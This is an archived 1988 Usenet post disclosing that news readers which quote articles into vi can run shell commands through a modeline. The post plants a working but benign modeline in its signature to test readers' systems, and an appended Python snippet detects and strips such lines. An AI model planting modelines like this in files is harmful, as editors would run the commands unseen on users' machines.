Xref: utzoo news.sysadmin:1771 comp.unix.wizards:13068
Path: utzoo!attcan!uunet!rosevax!news
From: news@rosevax.Rosemount.COM (News administrator)
Newsgroups: news.sysadmin,comp.unix.wizards
Subject: Trojan horse possible with news readers
Message-ID: <6775@rosevax.Rosemount.COM>
Date: 1 Dec 88 21:44:34 GMT
Reply-To: merlyn@ernie.rosemount.com
Organization: Rosemount Inc., Eden Prairie, MN
Lines: 18

I don't know if this has been discussed before, but here goes...

Many news reading programs (rn, vnews, others?) allow you to include the
original text when following-up or replying-to articles. The default
editor is usually vi; some versions of vi will execute commands if they
see a line (near the top or bottom of a file) of the form

<:><:>

To see if your setup is vulnerable, start a (R)eply to me, then abort it
(I don't want your cards & letters). If you have the bug, a file called
'NEWSBUG' will appear in /tmp on your system, containing "any command".

Caveat Editor. I don't fix 'em, I just report 'em.
-----
Merlyn LeRoy
ex:!sh -c 'echo any command'>/tmp/NEWSBUG:
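A check a news reader could run on a reply draft before handing it to the editor, as an added example that is not part of the original post or of any news reader's code. The five-line window, the `ex:`/`vi:` pattern and the function names are assumptions made for the illustration.

```python
import re

# Assumption: the editor inspects this many lines at each end of the file.
MODELINE_WINDOW = 5
# Assumed form: "ex:" or "vi:" at line start or after whitespace, then commands.
MODELINE_RE = re.compile(r"(?:^|\s)(?:ex|vi):(.*)")


def find_modelines(text, window=MODELINE_WINDOW):
    """Return (line_no, command, has_shell_escape) for modeline-like lines
    within `window` lines of the top or bottom of `text`."""
    lines = text.splitlines()
    n = len(lines)
    in_window = set(range(min(window, n))) | set(range(max(0, n - window), n))
    hits = []
    for i in sorted(in_window):
        m = MODELINE_RE.search(lines[i])
        if m:
            command = m.group(1).rstrip(":").strip()
            hits.append((i + 1, command, "!" in command))
    return hits


def strip_modelines(text, window=MODELINE_WINDOW):
    """Drop modeline-like lines before the draft reaches the editor. Deleting
    a line moves its neighbours into the window, so rescan until clean."""
    lines = text.splitlines()
    while True:
        flagged = {no for no, _, _ in find_modelines("\n".join(lines), window)}
        if not flagged:
            return "\n".join(lines)
        lines = [l for no, l in enumerate(lines, 1) if no not in flagged]


# Constructed reply draft with quoted article text. Line 11 is the modeline
# from the post; line 6 is a constructed one just outside the bottom window.
SAMPLE_DRAFT = "\n".join([
    "Subject: Re: Trojan horse possible with news readers",
    "",
    "In article <6775@rosevax.Rosemount.COM> merlyn writes:",
    "> Many news reading programs include the original text.",
    "> The default editor is usually vi.",
    "> ex:!echo constructed second modeline:",
    "> Caveat Editor.",
    "> I don't fix 'em, I just report 'em.",
    "> -----",
    "> Merlyn LeRoy",
    "> ex:!sh -c 'echo any command'>/tmp/NEWSBUG:",
])
```

In editors that expose the option (Vim, for example), `set nomodeline` turns modeline processing off altogether, which removes the need to filter drafts.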